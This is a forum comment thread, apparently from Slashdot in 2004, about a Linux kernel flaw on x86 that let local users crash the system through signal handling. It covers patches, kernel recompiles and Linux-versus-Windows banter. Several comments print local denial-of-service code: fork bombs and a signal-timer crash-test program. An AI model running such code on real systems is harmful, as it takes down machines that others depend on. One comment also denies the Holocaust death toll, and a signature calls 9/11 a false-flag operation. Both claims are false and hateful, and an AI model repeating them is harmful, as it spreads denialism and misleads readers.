Removing the compiler wouldn't help, anyway - presumably most systems with public shell access also have some sort of ftp access. You could even rig up something to echo the binary to a file through a terminal, I'm sure.
It's interesting to see how such an obvious troll gets modded as funny.
It's even more interesting to see how such an obviously sarcastic and humorous post gets labelled "troll".
Sure, if you don't read the last paragraph, it's a troll. But come on.... "Admiral Taco", "the great Swede himself, Linux Torvaldis", "VB/Linux".
Thats gold Jerry.... GOLD!!
I suppose the answer is not allow access to a compiler for non-trusted shell users.
Please do not forget to deny using keyboard keys representing hexadecimal digits, i.e. A-F and 0-9 to untrusted users.
There you are, staring at me again.
Did you actually read it? I think it was the best troll parody I've seen for a while. I mean, the author clearly understood exactly what he was talking about when discussing C's support for pointers, which means that the way he missed the point and described them as 'inefficient' is marvelous.
Also, in light of recent events concerning the ADTI 'Samizdat' book & the author getting Tanenbaum's nationality wrong, describing Linus Torvalds as a Swede is a masterstroke.
The thing about Windows bugs is that many of them are remotely exploitable by unprivileged users; in order to exploit bugs like this, and in fact any root compromise that I know of, you need to first get a shell on the machine. Much harder than throwing up a web page or sending out a trojaned email.
--
I Hit the Karma Cap, and All I Got Was This Lousy
even the moderator - +1 Interesting... :-/
That man tried to kill mah Daddy
If so, I missed that news flash.
I think you also missed your sense of humor...
A troll, but a funny one. I just hope the guys in M2 get it...
I have a "very nearly vanilla" 2.4.26 kernel - all that's patched are some netfilter things for more targets. This patch didn't work for me - the patch went fine (my signal.c is no different from vanilla), and the resulting kernel booted fine, but the exploit still crashed my box. I'm using gcc-2.95.4 , Debian 3.0 (Woody). No I didn't forget to run lilo or whatever (i'm using Grub). Any ideas?
...because I don't think OSS has any "magical" powers to produce bug-free code, only better bug finders (In the CSS world, if it works you leave it alone. In Linux there's always someone tinkering with it). So, starting with the same codebase, Linux would appear to have more bugs to begin with, then less. Or maybe it's more buggy, work-in-progress like. It's very hard to tell, really.
Also note that if Windows had a "shell exploit" for non-admin users, the only thing it'd do for 99,9% of the users out there is to crash the user's own machine. I wouldn't want to try doing with Windows what you do with Linux...
Kjella
Live today, because you never know what tomorrow brings
their inspiration of a false sense of security? :P
..I am afraid that this comparison might fall out to the advantage of Windows ...and how do you know this exactly?
I'm sure there is a comparable (if not greater) amount of critical bugs in windows's kernel that because of its closed nature we don't ever get to see or MS sweeps under the carpet without the public ever knowing they exist until someday they're found.
[alk]
Heretic! Everyone knows it's the Pathologically Eclectic Rubbish Lister.
That's not much of a solution; I'd just compile the binary on another system with matching library versions and then upload and execute it on your machine.
Additionally, the "my programming language is better than yours" conversation is off-topic and grossly redundant, and I apologize for helping it to continue.
(Score:-1, Flamebait)
Apology accepted.
Hey, at least Linux trolls are consistent, unlike Windows :)
No, YOU are an ass. An obvious troll, and you swallowed it hook, line and sinker. You read something that says that Alan Cox is excited about switching to VB and didn't smell a rat? Bwahahahahah!
infinite loops can crash systems? who'da thunk it!
"Linux has been plagued by local exploits for a long time, but you have to get on the server FIRST."
...
For that, you use the same techniques as on Windows: vulnerabilities in daemons, CGI scripts, trojans, backdoors,
Please correct me if I got my facts wrong.
Here's how:
Add compiler group:
Move to correct directory:
Make most common compilers part of the compiler group
Set permissions
To add users to the group, modify and change to '123' will be different on your installation.
Again, don't think this is a fix for the exploit. It's just a good little step in securing a box.
"I filter at +6, and have yet to miss out on an important comment." (#822545)
crack smokers unite.. all too long have we been derided as ignorant burntout freaks.. by people who dont undesrtand us.. we have made much progress since the 80s and have a great new gui too..
Crash occurs without syscalls.
Crash happens on all machines, but only locks up one CPU at a time on SMP.
Crash occurs with any signal, also on return from exec syscall.
Crash occurs only on x86 and x86_64.
read.
YHBT = "You have been trolled"
YHL = "You have lost"
HAND = "Have a nice day"
ROTFLMAO = "Rotten floor mayo"
HTH
author just did a copy and paste from:
http://www.google.com.au/search?q=cache:_X9ocw-9YjYJ:dbforums.com/arch/88/2002/7/364963+Admiral+Taco++linus&hl=en
Don't worry, and run up2date/yum/apt-get or update tool of your choice. For all I know, my box could already be fixed and I don't know it yet.
Recompiles are for people who are really on the bleeding edge. The equivalent would be being on some privileged hotfix service with Microsoft. If you keep up with your distro's fixes you'll be at least as safe as with MS update, and it's just as easy.
Kjella
Live today, because you never know what tomorrow brings
Two words for people like you...
SUNLIGHT VIRGIN.
Question for the kernel gurus out there -- I read the article and the patch (so sue me), and it seems to me that the patch just redirects the signal-handler flow if sig==8.
This may well protect against the example exploit, but what happens if you get a floating-point exception in the handler for some other signal?
The provided patch does not look like a real fix, unless the deeper bug really does just involve sig==8.
2*3*3*3*3*11*251
LOL!!....what a fucktard.
It was a joke.
As I said to another moron who missed it, you are a SUNLIGHT VIRGIN. Interaction with things other than that humming box lets you get things like this. Trust me, even though the sun is bright and hot, it won't hurt you.
my sig's at the bottom of the page.
int main(int argc, char **argv)
{
    while(1) {
        fork();
    }
    return 0;
}
JET Program: see Japan, meet intere
Fuck the GUI
Right now, any semi-current linux setup is a sitting duck for this kind of DOS attack. It will stay this way, until some programmer sends the maintainers a patch, and the maintainers release it as a new version (and the distributions make it available to their users). I'm guessing there is a minimum three days for all of this to come about, and I'm sure not seeing a fix on kernel.org right now. Sure you need a shell to run the DOS exploit, BUT do you really think crackers aren't working on a remote version right now?
With commercial vendors, convention among the white hat hackers is to inform the vendors, and agree to a non-disclosure period (3 months?) before making the security hole public. That is certainly a preferable method than leaving thousands of linux machines vulnerable right now.
Perhaps Linus could assign a volunteer for the development and stable kernels to act as "security" maintainer. Ethical hackers could report the details to them, the security officer can contact the developers that have their code affected. Between them and whatever volunteers they can discreetly ask for help could code a fix, test it, and then have it merged/released into the official trees as a security fix. This would minimize the sitting duck situation. Even if Linus decides not to implement this, it should be done at every commercial distributor. They tend to release their own tweaked kernels anyway, and it would be a service to their customers. Plus, they can inform their customers to update, and let the information wreak havoc with their competitors (until they implement and distribute a fix).
There is no America. There is no democracy. There is only IBM and AT&T and DuPont, Dow, General Electric, and Exxon
Love that troll.
Idiots write slow C code- Java and C# will always be slower. As they are written with C how can they be faster? The benefit of Java and C#, is that they make idiots' code run faster than it normally would.
Is this the stolen code that SCO's been complaining about?
I'm only paranoid because everyone is against me...
For instance, it is in fact a standard troll technique to call Linus Norwegian/Swedish/Danish/whatever, anyway. So, if this is indeed a "masterstroke" arising from the events you describe, it is still indistinguishable from a real troll.
Or, am I smoking crack?
To have a right to do a thing is not at all the same as to be right in doing it
The update may be available faster than on Windows, but you cannot say that it is /easier/ to apply than a Windows patch. I hate recompiling my kernel; it always takes me a number of attempts until everything works. Also, my server is running Linux and is serving two houses of people with net access; I can't just take it down and mess around with it for hours while I have fun trying to get a working kernel. So regardless of when the patch was released, I still need to wait until later tonight to apply the patch.
I spent ages trying to think of sig, but never did
For a moment I thought you were serious; as I read the first 2 lines of your post ... I felt this venom building up inside me. Then I saw your thread was marked funny. What a relief.
This is just a random idea, and I'm sure y'all will have plenty of ways to shoot it down, but maybe we need at least some sort of base level of certification so that we can decide whether or not to accept packets or e-mails from a given machine. It sounds dangerously similar to trusted computing, but we do need to ensure that people (switching metaphors mid-post) driving on our information superhighway have a minimally safe vehicle, at least so that they don't go crashing into everyone else.
How could this be done? Maybe my machine runs some quick security checks on your machine whenever you try to connect to mine. Or I trust someone else's word about whether your machine at least meets the minimum safety standards. Let this never let anyone fall into a false sense of security just because that minimum level is met. And that minimum level should change as new threats emerge. But it would reduce the penalty that the whole driving population pays for the mistakes of one subset. That subset would have to at the very least get their license or we could shut them out of driving near us.
So who is serious enough about security to want this patched, but stupid enough to just accept a patch from any of thousands of developers? Yes, you could evaluate the source of each patch and recompile using the new code, but who has time for that? Open Source and proprietary software are no different in terms of patches. If you don't get it straight from the horse's mouth then you are not following very good security procedure.
After all, doesn't anyone remember this? You can find open source patches for proprietary software every once in a while too, but you would be nuts to trust them.
So if I run this exploit in a user-mode-linux instance, do I crash the UML or does it get the host OS also?
Lessons learned: (1) use Linux and keep it up-to-date with apt-get; (2) in the games partition which runs windows, *never* patch anything.
'cos not a single one of you muppets can even write the equivalent of Hello World and get it right.
#include <stdio.h>
#include <stdlib.h>

int main( int argc, char *argv[] ){
    int r;
    (void)argc;
    (void)argv;
    /* printf returns the number of characters written, or a negative value on error */
    r = printf("I love C\n");
    if( r < 0 ){
        r = EXIT_FAILURE;
    }else{
        r = EXIT_SUCCESS;
    }
    return r;
}
Yeah, right.
Join us. There are clowns and ballons, and clowns with ballons and everything down here! It's great, you'll love it. They always do, we make sure of it!
Every system has bugs. I'm just pleased that this bug was noticed and handled so quickly and efficiently. And I'm no guru but from my understanding you have to want to break the kernel by issuing compiling and executing code such as this... Heck, I can crash MS XP Pro by simply running IE. :P
Some people are pedantic about these sorts of things. Personally my only spelling pet peeve is seeing people use 'alot'.
*shrug*
If you maintain a Linux system for a larger group of people, you should know what you are doing. Pardon me, but obviously you're not.
...
As soon as I read this I upgraded our Firewall at work. I downloaded the latest 2.6, got the patch from the bottom of the linuxreviews site. That took about 4 minutes on a somewhat fast internet connection.
Extracting the Kernel and patching it: 1 minute, brain involved: none (patch howto on that page as well; besides, if you are a real sysadmin you'll be able to do kernel patches single-fingered).
Configuring the kernel: 1 minute as well, using make oldconfig (porting over my .config from 2.6.4, then answering a few questions for new options), brain involved: 1%, well documented in case of doubt.
Compiling: make-kpkg kernel_image: 10 minutes, brain involved: 0%.
Installing: dpkg -i ../kernel....: 10 seconds, brain involved: 0%. :P
Rebooting: about 1.5 minutes, brain involved: how fecking hard can it be to type 'shutdown -r now'? Or maybe even 'reboot'.
This also answers the other posting where somebody was whining about making the updates moronproof... Most distros have this 'feature', autoupdating. Redhat: up2date, Debian: apt (through security.debian.org),
No. Check perlfaq1(1) for the whole story.
:wq
Gee, I remember when programs intentionally written to crash the OS were simply considered lame not security exploits?
Or have they been grasping at straws lately trying to come up with linux exploits so they decided to make this sound a bit more grand?
I can write one for Windows, MacOS, Linux, etc etc etc for eternity. Hell on most OS's simply using enough memory will do it.
There are easier ways, how about pressing the power button? or perhaps ctrl+alt+delete. Yup, uber security exploit which takes down the system, allows no code execution or priv escalation, gives absolutely no access to anything the user shouldn't have access to and will result in immediate termination of his account when you do a process audit... just like doing the same thing a million other ways will.
Give them a compiler and they can bring down the system, each time every time, ANY system. But I'd hardly call that an exploit.
If you have the habit of leaving the machine on for extended periods, you will not receive notification of new updates until you cycle power (possibly log out and back in too...). Lots of Wusers do this (leave their computer on), which may leave them thinking they are well protected when in fact their machines may need urgent patching.
Is it specific to /. the lack of humor in the answers to this post...
Not seeing the humor here is hard...
I consider myself to be very technically inclined having programmed in VB for the last 8 years doing kernel level programming...
The above non sequitur bit of hilarity says it all... I can just imagine it: "I've written an OS in VB and compiled it, saved it to a floppy and booted it."
OK, replying to myself, did some digging on LKML and found this.
Disclaimer: I have not personally tried either fix, but the second one (which modifies the "clear fpu" macro in the i387 header file) looks like a more appropriate fix to me.
The provided patch is for the 2.4.27-pre5 kernel, but my 2.4.26 "i387.h" file was the same, the patch can be applied. (Again, haven't tested it yet, don't know if it works.)
2*3*3*3*3*11*251
You know, I was going to try to jab you for fun, and post "Yeah, that bugs me alot too." I typed it several times, and cleared it out. Seeing that awful "word" bugs me so much I can't even have a little fun at your expense with it! How's that for crazy?
There are 1,001 ways to crash a linux kernel with access to a shell.
Save some keystrokes and give:
for(;;)
{
    malloc(1);
    fork();
}
a try.
... yeah, that really gets me alot of the time too !
It's people like you that are holding Linux back and out of the desktop market. You cannot assume that everyone who wants to use Linux must know how to recompile a kernel or even how to compile any program. If Microsoft issued updates like this, how many in their user base would be able to apply them, no matter how many HOWTOs there were?
/more/ people running linux?
I use Linux because it's stable and does what I want it to, including traffic shaping. I CAN apply patches to the kernel and know how to recompile it. But that does not mean I am an expert at it. Of course, what was I thinking? If I am to use Linux then I must be an expert; screw the learning curve, I should know it all in 5 mins!!
With that attitude how is anyone EVER going to move over to Linux, what about the person that installed linux yesterday to give it a try, are they supposed to know how all this works? I am a student and the houses I serve the internet to are my mates, we had Windows2003 server for a while but it didn't have any traffic shaping. Students tend to love running P2P and sucking bandwidth, so I switched to ClarkConnect and setup a traffic shaping script.
I am sorry for not being as L33T as you, I crumble in your presence. Oh, and thank you for pointing out how much more effort this patch requires than clicking "INSTALL" when windows pops up the dialog asking if you wish to install that update that it automatically downloaded for you, or even the update that it automatically installed for you if you have that option checked.
You completly ignored the whole point of my post and banged on about how I shouldn't be running linux if I can't do xyz, maybe I'll switch back to Win2K3 in that case, I mean, why would you want
kthxbye
I spent ages trying to think of sig, but never did
First, C is as fast as you program it to be. I generally consider C++ bloated, Java overkill and C# one of the dirtiest languages I have ever seen (the error handling, for example). VB is not programming, and besides, BASIC is a lot more ancient than C.
Granted, this crashme program, which requires local shell access, does seem to work in some cases.
However, it does not do so on suse linux 9.1 - it creates an unkillable process, but the system continues to run normally.
At least pure 2.6.5 from kernel.org running on P4 2GHz.
They were the ones who paid someone to code this exploit.
if you steal from one source, that is plagiarism, if you steal from many, well, that's just research.
The fix is available here.
Oh, come on! After all the crap we get from Linux users every time an exploit is found in Windows, you have to expect that we're going to give you guys some shit when it happens to you, primarily because it doesn't happen that often.
So there it is, flame away :-)
Yes, you have to recompile your kernel. But it really is not that big a deal (all the same, I wouldn't do it on a machine in co-lo without an already-established phone line to a person standing in front of the box).
Think of the kernel as just another tarball, which has a slightly weirdy make procedure {like, you can't just go 'make install'}. You have to download the kernel sources from a kernel.org mirror, your distribution's kernel patches from one of their mirrors {while Slackware users point and laugh}, and the local exploit patches from the site mentioned in the article.
If you use KDE, there is already a graphical kernel configurator known to work with 2.4 series kernels -- it may not work properly with 2.6 series kernels, but there probably is a patch.
Otherwise, apply your distribution's kernel patches (if any) as per their instructions, followed by the article patch. Then carry on with your distribution's instructions. If you're really lucky, your old .config file will work for the new kernel -- and if not, it probably is time to upgrade anyway.
And don't be put off by the rumours that you can trash your box this way. The worst that can happen is you forget to run LILO and have to boot from a CD-ROM. You can then run LILO and reboot. {Actually that's not true. The worst that can happen is you do run LILO as you meant, but you had incorrectly jumpered both drives on the primary IDE controller as masters when you meant cable select, and you stomp all over the bootloader and kernel on the "slave" drive. Trust me, you do NOT want to do that. Was a 'mare to get sorted and I ended up losing the partition I was trying to rescue because I made a brain-fart.}
Je fume. Tu fumes. Nous fûmes!
The same cannot be said of many proprietary OSes...
(Reposted, account some asshole moderating it as "troll")
I see comments about how it only took a few days for the open source community to respond to this bug. In a comment made by Ayanami Rei, an article is linked that is dated December 12, 2003 that details this problem. Isn't that a 6-month response time to this issue? It would appear that Linux is subject to the same patching issues as MS is, even though the reasons are a bit different.
2.5.42 gives floating point exception, at least as non-root
-@ip6ctrl:~/scripts$ gcc evil.c -o evil-crashme
-@ip6ctrl:~/scripts$ ls
dropall.sql evil-crashme evil.c truncate.sql
./evil-crashme ........*............*Floating point exception
-@ip6ctrl:~/scripts$
-@ip6ctrl:~/scripts$ uname -a
Linux ip6ctrl 2.5.42 #1 Wed Aug 6 13:46:27 EDT 2003 i686 unknown
- Sig
#include <signal.h>
#include <sys/time.h>
#include <unistd.h>

static void Handler(int ignore)
{
    char fpubuf[108];   /* unused in this version of the program */
    (void)ignore;
    (void)fpubuf;
    write(2, "*", 1);
}

int main(int argc, char *argv[])
{
    struct itimerval spec;
    (void)argc;
    (void)argv;
    /* deliver SIGALRM every 100 microseconds, starting 100 microseconds from now */
    signal(SIGALRM, Handler);
    spec.it_interval.tv_sec = 0;
    spec.it_interval.tv_usec = 100;
    spec.it_value.tv_sec = 0;
    spec.it_value.tv_usec = 100;
    setitimer(ITIMER_REAL, &spec, NULL);
    while(1)
        write(1, ".", 1);
    return 0;
}
By simply commenting out the inline assembly, I fixed crash.c so it can no longer crash Linux!
1 2 1 2 THE NAKEN CREW
by typing:
at the bash-prompt :-)
ref.url : http://forums.gentoo.org/viewtopic.php?t=67302
I don't claim I know more than I know, and if you know you know more than I know, then by all means, let me know.
You completely ignored my point as well :P
I was trying to say that if you administrate a network you need to know what to do in order to maintain it.
You are obviously more advanced than Joe Doe, yet you complain about your daily (weekly?) bread, that's what I was getting to.
And, as I shortly mentioned before, there IS a solution for the average user who just installed Linux yesterday. Apt/Up2date/Emerge/and whatever their names are.
It is also not about being cool, those are simple tasks that at least people who are willing to look into things can understand.
In simple words:
(Corporate) Administrators, who need to apply patches within days/hours should know what they are doing, so they can do it efficiently and fast without having to rely on external help. Home users can wait until patches and updates hit the official distribution channels for their distro.
*opsi*
I don't claim I know more than I know, and if you know you know more than I know, then by all means, let me know.
Thanks for the info.
In the near future, I want to use SUSE 9.1. Their YAST tool supposedly helps automate security updates.
Excuse my ignorance (anyone who wants to respond), but do I use YAST to
get the kernel update and then recompile?
How am I supposed to keep up with this stuff?
My beliefs do not require that you agree with them.
Finally something funny and it gets modded troll!!! "the Microsoft "shared source" program seems to offer all of the same freedoms as the GPL." Come on that is funny stuff.
He didn't say he was running a corporate network, he said he was running a network for a few houses. He IS a home user with a shared server so before you jump down his throat, why don't you read a little and figure out just what he is trying to say?
I agree that users should be capable of updating their systems; if they can't, then the system needs to do it for them. The problem is that if you are running a custom Linux or you've changed something somewhere, update tools like apt and Emerge can go totally wrong. I've never seen this issue with Windows. I guess this is the price we pay for having an operating system that is so customisable; it breaks compatibility and standards too easily.
I spent ages trying to think of sig, but never did
stop making sense please.
ogm liek dont use linux it si hax0red! linux sux0rz!!!!!111
Oh, when Linux has a vulnerability, it's swept under the rug. Windows is blasted by so-called "hackers" or somesuch. Bloody hell. Every bit of software has its vulnerabilities; it's written by man, for goodness' sake.
It's called sarcasm you stupid piece of shit
That revolver must have like a million barrels.
First off, I'll go ahead and agree with that statement! This could be nothing more than a greater amount of attention being paid Linux every year - or it could be that the increasing commercialization of linux is taking it away from its more stable roots. Either way, it's disconcerting.
Windows kernel had in the last 12 months? I am afraid that this comparison might fall out to the advantage of Windows.
It's hard to compare - studies I've seen (can't remember where, or I'd link) suggest that the overall bug rate in the two codebases is similar, but that Linux generally tends to pay more attention to critical areas (this exploit notwithstanding).
Until you take into account time to fix, maybe
Now that's part of the critical bit. Not to mention which the Windows platform has a number of bugs that can be inflicted 1) remotely, and 2) without user access. Because windows does such a poor job protecting resources at the port level, it means that no human intervention is in any way required to propagate an exploit. Thus, while kiddies may attack individual linux machines, they can release exploits that can ultimately affect an unlimited number of windows machines. That's the real problem, the exponential nature of windows exploits.
Great way to start off the week. Funny-as-hell, obviously satirical post followed by the inevitable clueless replies thinking it's real, followed by vain attempts to educate the clueless in the ways of sarcasm and irony. Ah, the eternal dance of Slashdot poster and postee. BTW, this guy has some great ideas as well.
If the user has access for a custom procmailrc that can count as shell access but few people realise this.
Sam
blog.sam.liddicott.com
Tested their code on Redhat ES 3.0 with all current updates applied (2.4.21-15.ELsmp - they haven't released any new kernel updates specific to this problem). The process will suck up a cpu spinning in a tight loop, and is unkillable (even as root with kill -9), but it does not crash the system.
Redhat seems to have different code in signal.c around the area the signal.c patch mentions, but does not have the i387.h patch.
11*43+456^2
That whooshing sound is the joke going over your head.
Brilliant writing style, elaborate sentences with excellent spelling. Subtle light style actually requiring to read the comment to recognize its intention. Vintage Adequacy-grade stuff.
Ada95 is blazing compared to C... All that runtime type constraint checking picks things up a bit... And it's new.. the 95 stands for 2095 er.. I mean 1995, so its spiffy newness means greatness. It even has socket support in GCC now so....
Seriously though, it's really hard to write bug-free C code. Maybe changing languages isn't such a bad idea to think about.
I find it interesting that the treatment of exploits is so different between Windows and Linux. If it's a Windows exploit, the tone is "see how bad Microsoft is...". If it's a Linux vulnerability, the tone is "open source is so wonderful". An exploit is an exploit regardless of the vendor or development process...
So...from the article.
Using this exploit to crash Linux systems requires the (ab)user to have shell access. The program works on any normal user account, root access is not required.
This is bad considering how many *nix systems have telnet open on the outside. It also posts the code to crash with on the website. Any idiot can cut & paste it & compile with gcc.
The exploit was reported as gcc bug 15905 2004-06-09.
Wow, a story posted within 5 days on Slashdot. I'm impressed. Usually everyone knows about an exploit and it's patched before we get to MS bash while *nix has a hole. FYI patches are listed on the site if you read the article. I'm interested to know how many used them.
Two roads diverged in a wood, and I - I took the one the bus load of girls just went down.
Linux has failed you. Where's your God now nerds? Where's your god now?
Your sysadmin needs that advice and your production server has 958 users.
You'll never catch me alive ...
Hey! You forgot to mention where the "x" in "linux" came from! And what happened to your "linux worm"? And the rest of your GPL fud ?
It's easy, just put aside your objectivity and strap on your /. tinfoil hat and have at it.
My test was on a dual P4 (hyperthreading). Running a single instance of the code only locked a single cpu. I just played with it again, and running 4 instances locked the box. So RHEL3 is vulnerable, and a correct description of the problem is that the exploit locks up 1 cpu in an endless loop that cannot be stopped. For systems with multiple CPUs, you have to do this once for each cpu (twice for each physical cpu if hyperthreading) in order to lock the whole box up.
My life's goal is to get a score of +3!
Unless you get hurled into it.
My only political goal is to see to it that no political party achieves its goals.
You really need to be on the look out for signs that a post is intended to be taken humorously before you write a long refutation of said post.
But it is funny! Why should something get modded as troll just because some people don't get the joke?
Why not use a tool like crashme to find them?
PHEM - party like it's 1997-2003!
Who modded this funny? This is older than dirt.
love is just extroverted narcissism
and so is Solaris...
As someone who has been doing sys admin on Solaris for 7 years, and has messed around a bit with Linux for the last 10, I've always wondered about maintaining Linux on a production system with respect to patches. I realise that there are many distros, but if it is the case that you need to recompile code to patch the kernel then that is just not good enough any more. Making, compiling or linking has ever been a part of kernel patching in my experience, and if Linux is to be used on large SMP boxes, let alone desktops, everyone involved is going to have to work to make patching the kernel as slick, and generally trouble-free, as it is on Solaris. Yes, I know it can be a nightmare on Solaris sometimes too, but generally it just works. Yes, I know this is partly because Solaris is proprietary and it's easier for Sun, but the point still stands. Everything that can be done to make kernel patching easy should be done.
Saying it's OK as is because you need to know what you are doing sounds very hollow indeed.
ooooooo, burned!
That's right. All your base.
Hackers who have secret shell access are not going to crash the machine. That would be stupid, they would probably lose whatever they did to get the secret shell access, and lose the ability to mess with the machine or to use it to get into other machines, or use it to spew spam.
This is really only a problem for a system that provides shell accounts (or another way to run arbitrary software) remotely to normal users. Such a system is pretty insecure anyway. You can easily run software on Linux that will eat all the process time and make it so difficult to kill the runaway process that the machine might as well have crashed.
http://linux.bkbits.net:8080/linux-2.5/diffs/include/asm-i386/i387.h@1.16?nav=index.html|src/.|src/include|src/include/asm-i386|hist/include/asm-i386/i387.h
Not to prey on someone else's excellent post, but he forgot to mention VB.net's full domain name support, which is obviously lacking in the Linux C kernel.
Until Linux C gets full domain name support, it will be substandard as a networking language.
I think you underestimate just how much I just don't care.
The *first* post I see is some bullshit lauding the superiority of the opensource development process with this as an example. RTFA. Here is some sensible info and advice.
1. There *was no patch*. Some systems were immune, but that was completely by chance.
2. There is a patch *now*, but the article also says people are already using the thing to crash free shell providers on day 0.
3. The patch, at this point, requires a kernel recompile. Not everyone running Linux knows how to do that. Many who do are too lazy. Don't give me some shit about how everyone running Linux is so 1337 that they will be sure they have already patched their system. I know you. You aren't that 1337.
4. Yes, this *is* a big deal. We were caught with our pants down, plain and simple. This *is* worse than any windows security issue that has come up in a long time.
5. Please *do* compile the demo code against your system and test it. If your system crashes, please patch. Don't act like many and just ignore this, especially if you are running a server or anything that stays connected for any amount of time. It also might be a good idea to turn off your telnet and ssh daemon (yes, even ssh) until you patch.
6. If you are *not* running Linux or not running on x86, it might also be a good idea to test the demo code against your system. If you are running Windows, some versions of Windows *do* support POSIX to a limited degree. The code *might* compile. Then there is also Cygwin. This is probably a bug specific to Linux x86, but it won't hurt to check.
If you don't believe me, post a few public IP addresses of your corporate network and see how many new friends you make.
I'm guessing a lot of people could use the extra disk space.
ZZ
Right. The only thing that might help is to use a noexec mount option while mounting the filesystems the untrusted users have write access to.
And, oh, I haven't seen one Slashdot know-it-all post a link to the correct patch (not the one which merely stops the example code posted) for the problem.
Kids these days. Has Debian made it so people don't know how to edit a lilo.conf anymore?
Not really, just about any newbie distro (Fedora, Mandrake, SuSE) pushes pre-compiled kernels to users, so all they have to do is update the system and reboot. If they were compiling their own kernel, well, they should know what to do.
When I found my lame parody of a website on the first page of Slashdot I instantly begged two nice people, igu and dvl666stn, to help me with the load. The site now has 3 A records all pointing to high bandwidth locations. The AAAA record for IPv6 is pointed at yet another location. I assume the main URL can handle the current and even more load. The sites listed as mirrors on the first page would probably not be able to handle the current load on their own, as these URLs are not load balanced.
9/11: Never forget it was a false-flag operation
On the other hand, if your post is modded as interesting, I will not be relieved.
yep
Which should be spelled "could've", and would seem to be as legitimate of a contraction as any in casual speech.
Trust me, even though the sun is bright and hot, it won't hurt you
So you say, I know otherwise. As a fair skinned person who once had SECOND DEGREE sunburns... I know just how much hurt the sun can inflict.
Help Brendan pay off his student loans
sudo yum -y update kernel*
is pretty easy.
Here's the email I got from Red Hat:
Fedora Update Notification
FEDORA-2004-171
2004-06-14
Product : Fedora Core 2
Name : kernel
Version : 2.6.6
Release : 1.435
Summary : The Linux kernel (the core of the Linux operating system)
Description :
The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc.
This update includes a fix for the local DoS as described in http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
...
If you were smoking crack you might understand that "troll parody" is meant to refer to a "parody posted by a troll" rather than a "parody of a troll."
This is not a DOS attack.
Roses are #FF0000, violets are #0000FF, all my base are belong to you
I actually removed rxvt from the GUI menu, no more risk from ignorant X users :D
;)
If I want a terminal, I'll use that hidden hot key combination
If someone discovered a block of code that can crash a Windows system, it wouldn't even make the news. It's much harder to write C code that doesn't crash Windows.
Give credit where credit is due, this troll was stolen from eggtroll originally posted here.
You're kidding, right? An easy argument could be made about how biased this site is. "Microsoft Violates Human Rights In China" is a past article that comes to mind...
Some are saying that this is worse than anything they've seen in Windows.
Uh?
What about
I won't go into the subject of worms/viruses.
But here we have a C program that needs to be compiled first and then executed!
It's an assembly-like infinite loop with a vengeance:
while(1){do crap
In my machine!
First you have to get inside MY machine to compile this.
Man, I could write 100 similar infinite-loop programs in C for Windows that would freeze all the same!!!!!! and do REAL damage as I have root privileges !!!
In Windows we had a fucking sound wave that CRASHED a SERVER!!!
Anyway, let's compile the code?
Let's crash my system? (here we go - I did this: system freezes)
Now let's go for a CLEAN reboot?:
Can Windows XP/NT do that? In case of a Disaster?
Enlighten me - I am no XP-NT-Admin. My guesses are you will have to cross your fingers and reach for the reset button.
A self-spreading virus for Linux running of a kernel - now THAT would be SERIOUS news.
Nevertheless I will patch it just for fun.
See this -> http://linux.bkbits.net:8080/linux-2.5/diffs/include/asm-i386/i387.h@1.16?nav=index.html|src/.|src/include|src/include
For the longest time, you could get full root access to any local Linux machine without needing a password just by passing the right command parameter to the LILO prompt.
Nothing is perfect. I don't care how many fanboys from either side try to convince me otherwise. Operating systems are not religions, they're fucking software made by humans.
Windows patch released:
"Stupid M$, now I have to reboot my Windows machine for a whole entire minute of downtime. My IT department will have to spend three months 'testing' this patch first, meanwhile allowing all the exploits in the wild to infect our network. Stupid Micro$loth sluts."
Linux patch released:
"This is just more evidence of the power and flexibility of Open Source Software. The patch is already released, and I'm recompiling my entire kernel on the production server and rebooting now. OSS is so much better than M$."
Since no one but I can access my Linux computers, and they reside behind a firewall, I am not going to do a damn thing. This is like no BFD to me. How many people need to provide anyone remote shell access to their personal systems?
If you have a system that does provide remote shell access you better get that recompile going. Otherwise it must be a slow ass news day.
If you don't like what I write don't be a CS and mod it down. Refute it.
Yea I can't spell. So what is your point?
Only if you restrict your definition of 'nonzero' to that in game theory, not that which is in wide use in engineering, physics and mathematics. And I wasn't discussing game theory at all. The more general meaning of the word 'nonzero' is "that which is not zero". Which is indeed what the etymology of the word would imply
I was using the term in a sociological context, bub. BTW, since you're so well versed in engineering and its terminology I'm sure you know that all computers built since the dawn of time (computing) to this day are said to use a "Von Neumann architecture"? Von Neumann was a mathematical genius, the father of the modern computational model and the original pioneer of game theory.
Quod scripsi, scripsi.
Don't listen to those other ones... they're crazy.
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
Right... and Stallman will call VB GNU/VB since then...
That's why you password protect LILO... well there goes your excuse for an argument.
For the longest time? You still can.
It's not a bug, it's a desirable feature.
s/fwait/fnclex/ in clear_fpu of include/asm-i386/i387.h.
This prevents you from being vulnerable.
He was joking... I wasn't sure till the very end (even then I wasn't totally)
For Linux, choice of:
I'd like to see a TwoKernelMonte variant for SMP which allowed you to isolate one processor from the kernel, bring up a patched version of the same kernel under it in cooperation with the running kernel (which process would presumably not survive any changes in in-memory structures, so check for that first), migrating devices across in idle moments, then finally deleting the old kernel and bonding the processor thus freed to the new kernel. Voilà, new kernel sans reboot. Ideal for a patching situation.
Got time? Spend some of it coding or testing
The Roman Catholic Church appears to have been provably responsible for at least 60 million deaths so far (probably over double that in real life; for example, records of the Goan Inquisition are very thin on the ground and it accounted for over a million all by itself; for another example, they sic'd the Manchu onto 70 million Ti Ping and haven't been called to account for that) but even this pales into insignificance compare with the great Atheist murderers like Stalin and Mao.
Not that it matters to the million or two who were actually killed, but six million is also an unsupportable number pulled out of someone's backside. Hitler was an amateur. He used the Jesuits and the Roman Catholic hierarchy as a model for his Third Reich (if there is a Catholic equivalent to SCO, his estate is in big trouble), and was still a Catholic in good standing when he died, despite having a fairly heavy obsession with the occult.
You do have to wonder about the mindset of the underlings who carried out all of this mayhem.
Yeah, I posted before really taking the time to figure it out, it seemed really similar to another troll from somewhere else. He did a great job with it though! LOL
Create a container file with UDF (64M worked for me). Mount it on loopback, and copy some large directory to it. Will lock the kernel up in no time.
But both of these require root privileges, typically. A crash bug that doesn't is much worse.
I love C++
This ancient troll-text *is* funny today... the kernel is written in C... there's a bug... get it? The luser responses are priceless too!
You mean we'll never be certain that we caught you. Or that you're alive. Depends how close you were to Schroedinger's cat...
